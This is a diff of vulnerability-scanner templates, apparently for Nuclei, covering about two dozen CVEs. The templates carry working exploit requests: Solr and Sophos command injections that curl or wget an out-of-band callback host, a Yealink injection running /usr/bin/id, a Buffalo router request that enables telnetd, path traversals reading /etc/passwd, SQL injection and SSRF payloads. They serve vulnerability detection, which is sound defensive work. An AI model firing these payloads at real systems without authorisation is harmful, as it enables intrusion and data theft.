cves/2019/CVE-2019-12616.yaml
View File

@ -2,7 +2,7 @@ id: CVE-2019-12616
info: info:
name: phpMyAdmin CSRF name: phpMyAdmin CSRF
author: Mohammedsaneem author: Mohammedsaneem,philippedelteil
description: A vulnerability was found that allows an attacker to trigger a CSRF attack against a phpMyAdmin user. The attacker can trick the user, for instance through a broken <img> tag pointing at the victim's phpMyAdmin database, and the attacker can potentially deliver a payload (such as a specific INSERT or DELETE statement) through the victim. description: A vulnerability was found that allows an attacker to trigger a CSRF attack against a phpMyAdmin user. The attacker can trick the user, for instance through a broken <img> tag pointing at the victim's phpMyAdmin database, and the attacker can potentially deliver a payload (such as a specific INSERT or DELETE statement) through the victim.
severity: medium severity: medium
tags: cve,cve2019,phpmyadmin,csrf tags: cve,cve2019,phpmyadmin,csrf
@ -18,12 +18,18 @@ requests:
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: word - type: word
words: words:
- "4.6.6deb4+deb9u2" - "phpmyadmin.net"
- "phpMyAdmin" - "phpMyAdmin"
condition: and condition: or
- type: regex
regex:
- 'v=[1-4]\.[0-8]\.' # Fix in 4.9.0
- type: status - type: status
status: status:
- 200 - 200
- 401 #password protected

36
cves/2019/CVE-2019-16313.yaml Normal file
View File

@ -0,0 +1,36 @@
id: CVE-2019-16313
info:
name: ifw8 Router ROM v4.31 allows credential disclosure
author: pikpikcu
severity: high
description: ifw8 Router ROM v4.31 allows credential disclosure by reading the action/usermanager.htm HTML source code.
reference: |
- https://github.com/Mr-xn/Penetration_Testing_POC/blob/master/CVE-2019-16313%20%E8%9C%82%E7%BD%91%E4%BA%92%E8%81%94%E4%BC%81%E4%B8%9A%E7%BA%A7%E8%B7%AF%E7%94%B1%E5%99%A8v4.31%E5%AF%86%E7%A0%81%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.md
- https://nvd.nist.gov/vuln/detail/CVE-2019-16313
tags: cve,cve2019,lfi
requests:
- method: GET
path:
- '{{BaseURL}}/action/usermanager.htm'
matchers-condition: and
matchers:
- type: word
words:
- 'user'
- 'pwd'
part: body
condition: and
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- '<td class="pwd" data="([a-z]+)">\*\*\*\*\*\*<\/td>'

4
cves/2019/CVE-2019-16332.yaml
View File

@ -5,7 +5,9 @@ info:
author: daffainfo author: daffainfo
severity: medium severity: medium
description: In the api-bearer-auth plugin before 20190907 for WordPress, the server parameter is not correctly filtered in the swagger-config.yaml.php file, and it is possible to inject JavaScript code, aka XSS. description: In the api-bearer-auth plugin before 20190907 for WordPress, the server parameter is not correctly filtered in the swagger-config.yaml.php file, and it is possible to inject JavaScript code, aka XSS.
reference: https://nvd.nist.gov/vuln/detail/CVE-2019-16332 reference: |
- https://plugins.trac.wordpress.org/changeset/2152730
- https://wordpress.org/plugins/api-bearer-auth/#developers
tags: cve,cve2019,wordpress,xss,wp-plugin tags: cve,cve2019,wordpress,xss,wp-plugin
requests: requests:

41
cves/2019/CVE-2019-17558.yaml
View File

@ -4,7 +4,7 @@ info:
author: pikpikcu,madrobot author: pikpikcu,madrobot
severity: critical severity: critical
reference: https://nvd.nist.gov/vuln/detail/CVE-2019-17558 reference: https://nvd.nist.gov/vuln/detail/CVE-2019-17558
tags: cve,cve2019,apache,rce,solr tags: cve,cve2019,apache,rce,solr,oob
requests: requests:
- raw: - raw:
@ -15,15 +15,10 @@ requests:
Connection: close Connection: close
- | - |
POST /solr/{{collection}}/config HTTP/1.1 POST /solr/{{core}}/config HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Connection: close
Content-Type: application/json Content-Type: application/json
Content-Length: 259 Content-Length: 259
Upgrade-Insecure-Requests: 1
{ {
"update-queryresponsewriter": { "update-queryresponsewriter": {
@ -37,25 +32,25 @@ requests:
} }
- | - |
GET /solr/{{collection}}/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27nslookup%20example.com%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1 GET /solr/{{core}}/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27curl%20http://{{interactsh-url}}%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Connection: close Connection: close
Upgrade-Insecure-Requests: 1
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
- type: status
status:
- 200
extractors: extractors:
- type: regex - type: regex
regex:
- '"status"\:\{"(.*?)"\:\{"name"'
name: collection
group: 1
internal: true internal: true
name: core
matchers: group: 1
- type: word regex:
words: - '"name"\:"(.*?)"'
- "Non-authoritative answer"
- "example.com"
condition: and

2
cves/2019/CVE-2019-20085.yaml
View File

@ -13,7 +13,7 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/../../../../../../../../../../../Windows/win.ini" - "{{BaseURL}}/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fwin.ini"
matchers-condition: and matchers-condition: and
matchers: matchers:

2
cves/2019/CVE-2019-3401.yaml
View File

@ -3,8 +3,10 @@ id: CVE-2019-3401
info: info:
name: Atlassian JIRA Information Exposure (CVE-2019-3401) name: Atlassian JIRA Information Exposure (CVE-2019-3401)
author: TechbrunchFR,milo2012 author: TechbrunchFR,milo2012
description: The ManageFilters.jspa resource in Jira before version 7.13.3 and from version 8.0.0 before version 8.1.1 allows remote attackers to enumerate usernames via an incorrect authorisation check.
severity: info severity: info
tags: cve,cve2019,jira,atlassian tags: cve,cve2019,jira,atlassian
reference: https://jira.atlassian.com/browse/JRASERVER-69244
requests: requests:
- method: GET - method: GET

32
cves/2019/CVE-2019-7238.yaml Normal file
View File

File diff suppressed because one or more lines are too long

18
cves/2019/CVE-2019-8451.yaml
View File

@ -8,17 +8,23 @@ info:
reference: reference:
- https://www.tenable.com/blog/cve-2019-8451-proof-of-concept-available-for-server-side-request-forgery-ssrf-vulnerability-in - https://www.tenable.com/blog/cve-2019-8451-proof-of-concept-available-for-server-side-request-forgery-ssrf-vulnerability-in
- https://jira.atlassian.com/browse/JRASERVER-69793 - https://jira.atlassian.com/browse/JRASERVER-69793
tags: cve,cve2019,atlassian,jira,ssrf - https://hackerone.com/reports/713900
tags: cve,cve2019,atlassian,jira,ssrf,oob
requests: requests:
- method: GET - method: POST
path: path:
- '{{BaseURL}}/plugins/servlet/gadgets/makeRequest?url=https://{{Hostname}}:1337@example.com' - '{{BaseURL}}/plugins/servlet/gadgets/makeRequest'
body: |
url=https://{{Hostname}}:443@{{interactsh-url}}
headers: headers:
X-Atlassian-token: no-check X-Atlassian-token: no-check
Content-Type: application/x-www-form-urlencoded
matchers: matchers:
- type: word - type: word
name: ssrf-response-body part: interactsh_protocol
words: words:
- '<p>This domain is for use in illustrative examples in documents.' - "http" # Confirms the HTTP Interaction
part: body

26
cves/2020/CVE-2019-9618.yaml Normal file
View File

@ -0,0 +1,26 @@
id: CVE-2019-9618
info:
name: GraceMedia Media Player 1.0 - Local File Inclusion
author: 0x_Akoko
severity: critical
reference: |
- https://www.exploit-db.com/exploits/46537
- https://nvd.nist.gov/vuln/detail/CVE-2019-9618
tags: cve,cve2019,wordpress,wp-plugin,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200

2
cves/2020/CVE-2020-13927.yaml
View File

@ -3,7 +3,7 @@ id: CVE-2020-13927
info: info:
name: Unauthenticated Airflow Experimental REST API name: Unauthenticated Airflow Experimental REST API
author: pdteam author: pdteam
severity: medium severity: critical
tags: cve,cve2020,apache,airflow,unauth tags: cve,cve2020,apache,airflow,unauth
requests: requests:

4
cves/2020/CVE-2020-24312.yaml
View File

@ -17,6 +17,7 @@ requests:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/wp-content/uploads/wp-file-manager-pro/fm_backup/' - '{{BaseURL}}/wp-content/uploads/wp-file-manager-pro/fm_backup/'
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: status - type: status
@ -26,3 +27,6 @@ requests:
- type: word - type: word
words: words:
- 'Index of' - 'Index of'
- 'wp-content/uploads/wp-file-manager-pro/fm_backup'
- 'backup_'
condition: and

36
cves/2020/CVE-2020-25223.yaml Normal file
View File

@ -0,0 +1,36 @@
id: CVE-2020-25223
info:
name: Sophos UTM - Preauth RCE
author: gy741
severity: critical
description: A remote code execution vulnerability exists in the WebAdmin of Sophos SG UTM before v9.705 MR5, v9.607 MR7, and v9.511 MR11
reference: |
- https://www.atredis.com/blog/2021/8/18/sophos-utm-cve-2020-25223
tags: cve,cve2020,sophos,rce,oob
requests:
- raw:
- |
POST /var HTTP/1.1
Host: {{Hostname}}
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.5.1.1
Content-type: application/json; charset=UTF-8
Origin: {{BaseURL}}
Connection: close
Referer: {{BaseURL}}
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
{"objs": [{"FID": "init"}], "SID": "|wget http://{{interactsh-url}}|", "browser": "gecko_linux", "backend_version": -1, "loc": "", "_cookie": null, "wdebug": 0, "RID": "1629210675639_0.5000855117488202", "current_uuid": "", "ipv6": true}
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"

26
cves/2020/CVE-2020-27361.yaml Normal file
View File

@ -0,0 +1,26 @@
id: CVE-2020-27361
info:
name: Akkadian Provisioning Manager - Files Listing
author: gy741
severity: high
description: An issue exists within Akkadian Provisioning Manager 4.50.02 which allows attackers to view sensitive information within the /pme subdirectories.
reference: https://www.blacklanternsecurity.com/2021-07-01-Akkadian-CVE/
tags: cve,cve2020,akkadian,listing,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/pme/media/"
matchers-condition: and
matchers:
- type: word
words:
- "Index of /pme/media"
- "Parent Directory"
condition: and
- type: status
status:
- 200

8
cves/2020/CVE-2020-35489.yaml
View File

@ -26,5 +26,11 @@ requests:
- type: regex - type: regex
regex: regex:
- '^= ([0-4]\.[0-9\.]+|5\.[0-2]|5\.[0-2]\.[0-9]+|5\.3\.[0-1]) =' - '^== Changelog =="'
part: body
- type: regex
regex:
- '^= (5\.3\.[2-9]+|5\.[4-9]+\.|[6-9]\.[0-9]+\.[0-9]+|1[0-9]+\.) ='
negative: true
part: body part: body

27
cves/2020/CVE-2020-35598.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2020-35598
info:
name: Advanced Comment System 1.0 - Path Traversal
author: daffainfo
severity: high
description: ACS Advanced Comment System 1.0 is affected by Directory Traversal via an advanced_component_system/index.php?ACS_path=..%2f URI.
reference: |
- https://www.exploit-db.com/exploits/49343
- https://www.cvedetails.com/cve/CVE-2020-35598
tags: cve,cve2020,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/advanced_component_system/index.php?ACS_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

40
cves/2020/CVE-2020-6637.yaml Normal file
View File

@ -0,0 +1,40 @@
id: CVE-2020-6637
info:
name: OpenSIS v7.3 unauthenticated SQL injection
author: pikpikcu
severity: high
description: openSIS Community Edition version 7.3 is vulnerable to SQL injection via the USERNAME parameter of index.php.
tags: cve,cve2020,sqli,opensis
reference: |
- https://nvd.nist.gov/vuln/detail/CVE-2020-6637
- https://cinzinga.com/CVE-2020-6637/
requests:
- method: POST
path:
- '{{BaseURL}}/account/index.php'
- '{{BaseURL}}/opensis/index.php'
- '{{BaseURL}}/index.php'
headers:
Content-Type: application/x-www-form-urlencoded
body: |
USERNAME=%27%29or%601%60%3D%601%60%3B--+-&PASSWORD=A&language=en&log=
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'SQL STATEMENT:'
- "<TD>UPDATE login_authentication SET FAILED_LOGIN=FAILED_LOGIN+1 WHERE UPPER(USERNAME)=UPPER(NULL)or`1`=`1`;-- -')</TD>"
condition: and
- type: word
part: header
words:
- "text/html"
condition: and
- type: status
status:
- 200

25
cves/2020/CVE-2020-7796.yaml Normal file
View File

@ -0,0 +1,25 @@
id: CVE-2020-7796
info:
name: Zimbra Collaboration Suite (ZCS) - SSRF
author: gy741
severity: critical
description: Zimbra Collaboration Suite (ZCS) before 8.8.15 Patch 7 allows SSRF when WebEx zimlet is installed and zimlet JSP is enabled.
reference: |
- https://www.adminxe.com/2183.html
tags: cve,cve2020,zimbra,ssrf,oob
requests:
- raw:
- |
GET /zimlet/com_zimbra_webex/httpPost.jsp?companyId=http://{{interactsh-url}}%23 HTTP/1.1
Host: {{Hostname}}
User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"

33
cves/2021/CVE-2021-20090.yaml Normal file
View File

@ -0,0 +1,33 @@
id: CVE-2021-20090
info:
name: Buffalo WSR-2533DHPL2 - Path Traversal
author: gy741
severity: critical
description: |
A path traversal vulnerability in the web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 could allow unauthenticated remote attackers to bypass authentication.
reference: |
- https://nvd.nist.gov/vuln/detail/CVE-2021-20090
- https://www.tenable.com/security/research/tra-2021-13
- https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2
tags: cve,cve2021,lfi,buffalo,firmware,iot
requests:
- raw:
- |
GET /images/..%2finfo.html HTTP/1.1
Host: {{Hostname}}
Referer: {{BaseURL}}/info.html
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- 'URLToken(cgi_path)'
- 'pppoe'
- 'wan'
condition: and

47
cves/2021/CVE-2021-20091.yaml Normal file
View File

@ -0,0 +1,47 @@
id: CVE-2021-20091
info:
name: Buffalo WSR-2533DHPL2 - Configuration File Injection
author: gy741,pdteam,parth
severity: critical
description: |
The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly sanitize user input. An authenticated remote attacker could leverage this vulnerability to alter device configuration, potentially gaining remote code execution.
reference: |
- https://nvd.nist.gov/vuln/detail/CVE-2021-20091
- https://www.tenable.com/security/research/tra-2021-13
- https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2
tags: cve,cve2021,buffalo,firmware,iot
requests:
- raw:
- |
GET /images/..%2finfo.html HTTP/1.1
Host: {{Hostname}}
Referer: {{{{BaseURL}}}}/info.html
- |
POST /images/..%2fapply_abstract.cgi HTTP/1.1
Host: {{Hostname}}
Referer: {{BaseURL}}/info.html
Content-Type: application/x-www-form-urlencoded
action=start_ping&httoken={{trimprefix(base64_decode(httoken), base64_decode("R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"))}}&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=127.0.0.1%0AARC_SYS_TelnetdEnable=1&ARC_ping_status=0&TMP_Ping_Type=4
matchers-condition: and
matchers:
- type: word
part: header
words:
- "/Success.htm"
- type: status
status:
- 302
extractors:
- type: regex
name: httoken
internal: true
group: 1
regex:
- 'base64\,(.*?)" border='

55
cves/2021/CVE-2021-20092.yaml Normal file
View File

@ -0,0 +1,55 @@
id: CVE-2021-20092
info:
name: Buffalo WSR-2533DHPL2 - Improper Access Control
author: gy741,pdteam,parth
severity: critical
description: |
The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly restrict access to sensitive information from an unauthorized actor.
reference: |
- https://nvd.nist.gov/vuln/detail/CVE-2021-20091
- https://www.tenable.com/security/research/tra-2021-13
- https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2
tags: cve,cve2021,buffalo,firmware,iot
requests:
- raw:
- |
GET /images/..%2finfo.html HTTP/1.1
Host: {{Hostname}}
Referer: {{{{BaseURL}}}}/info.html
- |
GET /images/..%2fcgi/cgi_i_filter.js?_tn={{trimprefix(base64_decode(httoken), base64_decode("R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"))}} HTTP/1.1
Host: {{Hostname}}
Cookie: lang=8; url=ping.html; mobile=false;
Referer: {{BaseURL}}/info.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 178
matchers-condition: and
matchers:
- type: word
part: header
words:
- "application/x-javascript"
- type: word
words:
- "/*DEMO*/"
- "addCfg("
condition: and
- type: status
status:
- 200
extractors:
- type: regex
name: httoken
internal: true
group: 1
regex:
- 'base64\,(.*?)" border='

4
cves/2021/CVE-2021-21389.yaml
View File

@ -7,7 +7,9 @@ info:
description: The BuddyPress WordPress plugin was affected by an REST API Privilege Escalation to RCE description: The BuddyPress WordPress plugin was affected by an REST API Privilege Escalation to RCE
reference: reference:
- https://github.com/HoangKien1020/CVE-2021-21389 - https://github.com/HoangKien1020/CVE-2021-21389
- https://nvd.nist.gov/vuln/detail/CVE-2021-21389 - https://buddypress.org/2021/03/buddypress-7-2-1-security-release/
- https://codex.buddypress.org/releases/version-7-2-1/
- https://github.com/buddypress/BuddyPress/security/advisories/GHSA-m6j4-8r7p-wpp3
tags: cve,cve2021,wordpress,wp-plugin,rce tags: cve,cve2021,wordpress,wp-plugin,rce

28
cves/2021/CVE-2021-21816.yaml Normal file
View File

@ -0,0 +1,28 @@
id: CVE-2021-21816
info:
name: D-LINK DIR-3040 - Syslog Information Disclosure
description: An information disclosure vulnerability exists in the Syslog functionality of D-LINK DIR-3040 1.13B03. A specially crafted network request can lead to the disclosure of sensitive information. An attacker can send an HTTP request to trigger this vulnerability.
author: gy741
severity: medium
reference: https://talosintelligence.com/vulnerability_reports/TALOS-2021-1281
tags: cve,cve2021,dlink,exposure,router
requests:
- method: GET
path:
- "{{BaseURL}}/messages"
matchers-condition: and
matchers:
- type: word
words:
- "syslog:"
- "admin"
- "/etc_ro/lighttpd/www"
part: body
condition: and
- type: status
status:
- 200

31
cves/2021/CVE-2021-24235.yaml Normal file
View File

@ -0,0 +1,31 @@
id: CVE-2021-24235
info:
name: Goto - Tour & Travel < 2.0 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2021-24235
tags: cve,cve2021,wordpress,xss,wp-theme
requests:
- method: GET
path:
- '{{BaseURL}}/tour-list/?keywords=%3Cinput%2FAutofocus%2F%250D*%2FOnfocus%3Dalert%28123%29%3B%3E&start_date=xxxxxxxxxxxx&avaibility=13'
matchers-condition: and
matchers:
- type: word
words:
- "input/Autofocus/%0D*/Onfocus=alert(123);"
- "goto-tour-list-js-extra"
part: body
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

4
cves/2021/CVE-2021-24320.yaml
View File

@ -5,7 +5,9 @@ info:
author: daffainfo author: daffainfo
severity: medium severity: medium
description: The Bello - Directory & Listing WordPress theme before 1.6.0 did not properly sanitise and escape its listing_list_view, bt_bb_listing_field_my_lat, bt_bb_listing_field_my_lng, bt_bb_listing_field_distance_value, bt_bb_listing_field_my_lat_default, bt_bb_listing_field_keyword, bt_bb_listing_field_location_autocomplete, bt_bb_listing_field_price_range_from and bt_bb_listing_field_price_range_to parameter in ints listing page, leading to reflected Cross-Site Scripting issues. description: The Bello - Directory & Listing WordPress theme before 1.6.0 did not properly sanitise and escape its listing_list_view, bt_bb_listing_field_my_lat, bt_bb_listing_field_my_lng, bt_bb_listing_field_distance_value, bt_bb_listing_field_my_lat_default, bt_bb_listing_field_keyword, bt_bb_listing_field_location_autocomplete, bt_bb_listing_field_price_range_from and bt_bb_listing_field_price_range_to parameter in ints listing page, leading to reflected Cross-Site Scripting issues.
reference: https://nvd.nist.gov/vuln/detail/CVE-2021-24320 reference: |
- https://m0ze.ru/vulnerability/%5B2021-03-21%5D-%5BWordPress%5D-%5BCWE-79%5D-Bello-WordPress-Theme-v1.5.9.txt
- https://wpscan.com/vulnerability/6b5b42fd-028a-4405-b027-3266058029bb
tags: cve,cve2021,wordpress,xss,wp-plugin tags: cve,cve2021,wordpress,xss,wp-plugin
requests: requests:

17
cves/2021/CVE-2021-26855.yaml
View File

@ -6,7 +6,7 @@ info:
severity: critical severity: critical
description: | description: |
Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078. Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078.
tags: cve,cve2021,ssrf,rce,exchange tags: cve,cve2021,ssrf,rce,exchange,oob
reference: reference:
- https://proxylogon.com/#timeline - https://proxylogon.com/#timeline
- https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse - https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse
@ -18,19 +18,10 @@ requests:
- | - |
GET /owa/auth/x.js HTTP/1.1 GET /owa/auth/x.js HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 Cookie: X-AnonResource=true; X-AnonResource-Backend={{interactsh-url}}/ecp/default.flt?~3;
Cookie: X-AnonResource=true; X-AnonResource-Backend=somethingnonexistent/ecp/default.flt?~3; X-BEResource=somethingnonexistent/owa/auth/logon.aspx?~3;
Accept-Language: en
Connection: close
matchers-condition: and
matchers: matchers:
- type: status
status:
- 500
- 503
- type: word - type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words: words:
- 'X-Calculatedbetarget: somethingnonexistent' - "http"
part: header

38
cves/2021/CVE-2021-27561.yaml Normal file
View File

@ -0,0 +1,38 @@
id: CVE-2021-27561
info:
name: YeaLink DM PreAuth RCE
author: shifacyclewala,hackergautam
severity: critical
description: A malicious actor can trigger Unauthenticated Remote Code Execution
tags: cve,cve2021,rce,yealink
reference: https://ssd-disclosure.com/ssd-advisory-yealink-dm-pre-auth-root-level-rce/
requests:
- method: GET
path:
- "{{BaseURL}}/premise/front/getPingData?url=http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id;"
matchers-condition: and
matchers:
- type: word
condition: and
part: body
words:
- 'uid'
- 'gid'
- 'groups'
- type: word
part: header
words:
- 'application/json'
- type: status
status:
- 200
extractors:
- type: regex
regex:
- "(u|g)id=.*"

7
cves/2021/CVE-2021-27905.yaml
View File

@ -26,13 +26,14 @@ requests:
Accept-Language: en Accept-Language: en
Connection: close Connection: close
extractors: extractors:
- type: regex - type: regex
regex: internal: true
- '"status"\:\{"(.*?)"\:\{"name"'
name: core name: core
group: 1 group: 1
internal: true regex:
- '"name"\:"(.*?)"'
matchers: matchers:
- type: word - type: word

Some files were not shown because too many files have changed in this diff Show More